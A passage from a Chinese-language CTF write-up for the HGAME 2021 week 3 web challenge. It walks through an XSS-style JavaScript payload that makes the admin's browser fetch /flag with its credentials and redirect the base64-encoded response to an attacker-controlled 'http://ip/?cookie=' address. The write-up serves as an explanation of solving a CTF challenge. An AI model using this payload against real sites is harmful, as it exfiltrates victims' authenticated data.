主页 > 网络知识 > HGAME 2021 week3(4)

HGAME 2021 week3(4)

而iframe里面<script>指向的JS:

xmlhttp = new XMLHttpRequest(); //是否能跨域 xmlhttp.withCredentials = true; xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == 4) { location.href = 'http://ip/?cookie=' + btoa(xmlhttp.responseText) //得用btoa()进行base64编码,不然flag会很神必 //尝试getAllResponseHeaders()不行,因为HttpOnly的Set-Cookie头不适用 } }; //设置连接信息 //第一个参数表示http的请求方式,支持所有http的请求方式,主要使用get和post //第二个参数表示请求的url地址,get方式请求的参数也在url中 //第三个参数表示采用异步还是同步方式交互,true表示异步 xmlhttp.open('GET', '/flag', true); //4.发送数据,开始和服务器端进行交互 //同步方式下,send这句话会在服务器段数据回来后才执行完 //异步方式下,send这句话会立即完成执行 xmlhttp.send('');

不能绕HttpOnly来获取cookie,但是我们可以直接让admin请求/flag,把responseText发给我们就行了;

这个是本地打的结果:

 

HGAME 2021 week3

 

大手一抖,flag到手:

 

HGAME 2021 week3

 

因为flag里面出题人故意放了&字符让我们踩坑,打出来的responseText需要base64编码。

 

HGAME 2021 week3

 

下面这个才对。

 

HGAME 2021 week3

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!